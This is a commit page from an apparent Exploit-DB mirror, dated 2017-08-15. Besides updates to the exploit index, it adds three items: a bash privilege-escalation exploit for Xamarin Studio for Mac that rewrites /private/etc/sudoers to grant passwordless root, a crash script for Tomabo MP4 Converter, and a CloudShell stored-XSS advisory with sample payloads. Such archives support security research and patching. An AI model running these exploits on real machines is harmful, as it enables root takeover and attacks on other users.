bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-08-15

Browse source 
3 new exploits

GetRight 5.2a - Skin File (.grs) Buffer Overflow
GetRight 5.2a - '.grs' Skin File Buffer Overflow

Tomabo MP4 Converter 3.19.15 - Denial of Service

Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation

Winamp 5.04 - Skin File (.wsz) Remote Code Execution
Winamp 5.04 - '.wsz' Skin File Remote Code Execution

PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit (Compiled)
PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit

Concrete5 < 5.4.2.1 - Multiple Vulnerabilities
Concrete5 CMS < 5.4.2.1 - Multiple Vulnerabilities

Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection
Concrete5 CMS 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection

Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting
Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting

Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion
Concrete5 CMS 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion

Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting

Concrete5 8.1.0 - 'Host' Header Injection
Concrete5 CMS 8.1.0 - 'Host' Header Injection

DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request
DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery

Red-Gate SQL Monitor < 3.10/4.2 - Authentication Bypass
Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass
This commit is contained in:
Offensive Security 2017-08-15 05:01:22 +00:00
parent 26466c9d62
commit bc1dac1620
21 changed files with 185 additions and 28 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
files.csv
View file

@ -104,7 +104,7 @@ id,file,description,date,author,platform,type,port
667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0
671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0
672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0
677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
677,platforms/windows/dos/677.txt,"GetRight 5.2a - '.grs' Skin File Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
679,platforms/windows/dos/679.c,"Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0
682,platforms/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0
683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0
@ -5639,6 +5639,7 @@ id,file,description,date,author,platform,type,port
42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0
42433,platforms/linux/dos/42433.txt,"WildMIDI 0.4.2 - Multiple Vulnerabilities",2017-08-08,qflb.wu,linux,dos,0
42445,platforms/win_x86-64/dos/42445.html,"Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure",2017-08-10,"Google Security Research",win_x86-64,dos,0
42451,platforms/windows/dos/42451.py,"Tomabo MP4 Converter 3.19.15 - Denial of Service",2017-08-13,"Andy Bowden",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9178,6 +9179,7 @@ id,file,description,date,author,platform,type,port
42429,platforms/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0
42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0
42435,platforms/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local,0
42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9360,7 +9362,7 @@ id,file,description,date,author,platform,type,port
409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0
418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
418,platforms/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
421,platforms/windows/remote/421.c,"Gaucho 1.4 - Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote,0
424,platforms/linux/remote/424.c,"Citadel/UX - Remote Buffer Overflow",2004-08-30,Nebunu,linux,remote,504
425,platforms/hardware/remote/425.c,"D-Link DCS-900 Camera - Remote IP Address Changer Exploit",2004-08-31,anonymous,hardware,remote,0
@ -16413,7 +16415,7 @@ id,file,description,date,author,platform,type,port
659,platforms/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0
673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
676,platforms/php/webapps/676.c,"phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Exploit",2004-12-05,evilrabbi,php,webapps,0
697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit (Compiled)",2004-12-17,overdose,php,webapps,0
697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit",2004-12-17,overdose,php,webapps,0
702,platforms/php/webapps/702.pl,"phpBB - highlight Arbitrary File Upload (Santy.A)",2004-12-22,anonymous,php,webapps,0
703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions Exploit",2004-12-22,sysbug,php,webapps,0
704,platforms/php/webapps/704.pl,"e107 - 'include()' Remote Exploit",2004-12-22,sysbug,php,webapps,80
@ -25575,7 +25577,7 @@ id,file,description,date,author,platform,type,port
17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0
17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite - reGenerateReports Stored procedure SQL Injection (Metasploit)",2011-10-02,Metasploit,cgi,webapps,0
17924,platforms/jsp/webapps/17924.pl,"JBoss & JMX Console - Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps,0
17925,platforms/php/webapps/17925.txt,"Concrete5 < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0
17925,platforms/php/webapps/17925.txt,"Concrete5 CMS < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0
17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps,0
17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0
18033,platforms/php/webapps/18033.txt,"Joomla! Component 'com_yjcontactus' - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
@ -32512,7 +32514,7 @@ id,file,description,date,author,platform,type,port
31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496
32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0
31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80
31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80
31735,platforms/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80
31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0
31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injections",2008-05-05,ZoRLu,php,webapps,0
31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
@ -35757,7 +35759,7 @@ id,file,description,date,author,platform,type,port
37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0
37101,platforms/php/webapps/37101.txt,"Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0
37102,platforms/php/webapps/37102.txt,"Joomla! Component 'com_videogallery' - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0
37103,platforms/php/webapps/37103.txt,"Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
37103,platforms/php/webapps/37103.txt,"Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
37106,platforms/php/webapps/37106.txt,"WordPress Plugin Video Gallery 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80
@ -37246,7 +37248,7 @@ id,file,description,date,author,platform,type,port
40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445
40042,platforms/php/webapps/40042.php,"WordPress Plugin Ultimate Membership Pro 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80
40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)",2016-06-29,KoreLogic,cgi,webapps,443
40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
40045,platforms/php/webapps/40045.txt,"Concrete5 CMS 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution / Cross-Site Request Forgery",2016-07-04,LiquidWorm,jsp,webapps,30303
@ -37997,6 +37999,7 @@ id,file,description,date,author,platform,type,port
41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@ -38067,7 +38070,7 @@ id,file,description,date,author,platform,type,port
41881,platforms/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",multiple,webapps,0
41882,platforms/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",multiple,webapps,0
41884,platforms/php/webapps/41884.rb,"Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)",2017-04-13,"Peter Lapp",php,webapps,0
41885,platforms/php/webapps/41885.txt,"Concrete5 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0
41885,platforms/php/webapps/41885.txt,"Concrete5 CMS 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0
41890,platforms/php/webapps/41890.txt,"Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset",2017-04-16,hyp3rlinx,php,webapps,0
41900,platforms/multiple/webapps/41900.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
41918,platforms/php/webapps/41918.txt,"FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-25,"Cyril Vallicari",php,webapps,0
@ -38239,14 +38242,14 @@ id,file,description,date,author,platform,type,port
42431,platforms/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80
42434,platforms/hardware/webapps/42434.py,"Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution",2017-08-08,"Kacper Szurek",hardware,webapps,0
42436,platforms/jsp/webapps/42436.py,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration",2017-08-09,LiquidWorm,jsp,webapps,0
42437,platforms/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request",2017-08-09,LiquidWorm,jsp,webapps,0
42437,platforms/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-08-09,LiquidWorm,jsp,webapps,0
42438,platforms/jsp/webapps/42438.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal",2017-08-09,LiquidWorm,jsp,webapps,0
42439,platforms/jsp/webapps/42439.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery",2017-08-09,LiquidWorm,jsp,webapps,0
42440,platforms/php/webapps/42440.txt,"WebFile Explorer 1.0 - Arbitrary File Download",2017-08-09,"Ihsan Sencan",php,webapps,0
42441,platforms/php/webapps/42441.txt,"ImageBay 1.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps,0
42442,platforms/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps,0
42443,platforms/php/webapps/42443.txt,"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting",2017-08-10,"Touhid M.Shaikh",php,webapps,0
42444,platforms/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10/4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",windows,webapps,0
42444,platforms/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",windows,webapps,0
42446,platforms/php/webapps/42446.txt,"DeWorkshop 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

38
platforms/macos/local/42454.txt Executable file
View file

@ -0,0 +1,38 @@
Source: https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html
Abstract
Xamarin Studio is an Integrated Development Environment (IDE) used to create iOS, Mac and Android applications. Xamarin Studio supports developments in C# and F# (by default). The API documentation update mechanism of Xamarin Studio for Mac is installed as setuid root. This update mechanism contains several flaws that could be leveraged by a local attacker to gain elevated (root) privileges.
Tested versions
This issue was successfully verified on Xamarin Studio for Mac version 6.2.1 (build 3) and version 6.3 (build 863).
Fix
Microsoft released a new version of Xamarin.iOS that addresses this issue:
- Security update for the elevation of privilege vulnerability for Xamarin.iOS: August 14, 2017 (4037359)
#!/bin/bash
# WARNING: this scripts overwrites ~/.curlrc and /private/etc/sudoers (when successful)
#target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.6.0.10/share/doc/MonoTouch/apple-doc-wizard
target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.8.0.175/share/doc/MonoTouch/apple-doc-wizard
rm -rf ~/Library/Developer/Shared/Documentation/DocSets
cat << __EOF > /private/tmp/sudoers
%everyone ALL=(ALL) NOPASSWD: ALL
__EOF
cat << __EOF > ~/.curlrc
url=file:///private/tmp/sudoers
output=/private/etc/sudoers
__EOF
echo
echo "*** press CRL+C when the download starts ***"
$target
echo
sudo -- sh -c 'rm -rf /private/tmp/ios-docs-download.*; su -'
rm -f /private/tmp/sudoers ~/.curlrc

20
platforms/windows/dos/42451.py Executable file
View file

@ -0,0 +1,20 @@
#!/usr/bin/python
# Exploit Title: Tomabo MP4 Converter DOS
# Date: 13/08/17
# Exploit Author: Andy Bowden
# Vendor Homepage: http://www.tomabo.com/
# Software Link: http://www.tomabo.com/mp4-converter/index.html
# Version: 3.19.15
# Tested on: Windows 7 x86
# CVE : None
#Generate a .m3u file using the python script and import it into the MP4 Converter.
file = "crash.m3u"
buffer = "A" * 550000
f = open(file, "w")
f.write(buffer)
f.close()

2
platforms/windows/local/11199.txt
View file

@ -1,5 +1,5 @@
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip)
EDB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder.
E-DB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder.

96
platforms/windows/webapps/42453.txt Executable file
View file

@ -0,0 +1,96 @@
# Vulnerability type: Multiple Stored Cross Site Scripting
# Vendor: Quali
# Product: CloudShell
# Affected version: v7.1.0.6508 (Patch 6)
# Patched version: v8 and up
# Credit: Benjamin Lee
# CVE ID: CVE-2017-9767
==========================================================
# Overview
Quali CloudShell (v7.1.0.6508 Patch 6) is vulnerable to multiple stored XSS vulnerabilities on its platform this can be exploited to execute arbitrary HTML and script code on all users (including administrators) from a low-privileged account.
==========================================================
# Vulnerable URL 1 (Reservation Function)
/RM/Reservation/ReserveNew
# Vulnerable parameter(s)
- Name
- Description
# Sample payload
'"><script>alert("xss")</script>
# PROOF OF CONCEPT
- Go to the "Inventory" tab
- Click on details button on either of the items
- Click on the reserve button and enter the XSS payload onto the affected parameters
- Add users to the permitted user list (e.g. admin accounts)
- Once the user click on the reservation list details, the XSS would be executed
==========================================================
# Vulnerable URL 2 (Environment Function)
/RM/Topology/Update
# Vulnerable parameter(s)
- Description
# Sample payload
'"><script>alert("xss")</script>
# PROOF OF CONCEPT
- Go to the "Environment" tab
- Click on item properties button
- Enter the XSS payload onto the affected parameters
- Change the owner to another user (e.g. admin accounts)
- Once the user click on the more info button of the item in the environment tab, the XSS would be executed
==========================================================
# Vulnerable URL 3 (Job Scheduling Function)
/SnQ/JobTemplate/Edit?jobTemplateId=<job template id>
# Vulnerable parameter(s)
- Name
- Description
- ExecutionBatches[0].Name
- ExecutionBatches[0].Description
- Labels
# Sample payload
'"><script>alert("xss")</script>
# PROOF OF CONCEPT
- Go to the "Job Scheduling > Add New Suite" tab
- Enter the XSS payload onto the affected parameters
- Once the user view details of this suite, the XSS would be executed
==========================================================
# Vulnerable URL 4 (Resource Template Function)
/RM/AbstractTemplate/AddOrUpdateAbstractTemplate
# Vulnerable parameter(s)
- Alias
- Description
# Sample payload
'"><script>alert("xss")</script>
# PROOF OF CONCEPT
- Go to the "Inventory > abstract template > Add New" tab
- Enter the XSS payload onto the affected parameters
- Once the user click on the more info button of the item, the XSS would be executed
==========================================================
# Timeline
- 06/06/2017: Vulnerability found
- 20/06/2017: Vendor informed
- 20/06/2017: Vendor responded and acknowledged
- 16/07/2017: Vendor fixed the issue
- 12/08/2017: Vendor agreed on public disclosure
- 14/08/2017: Public disclosure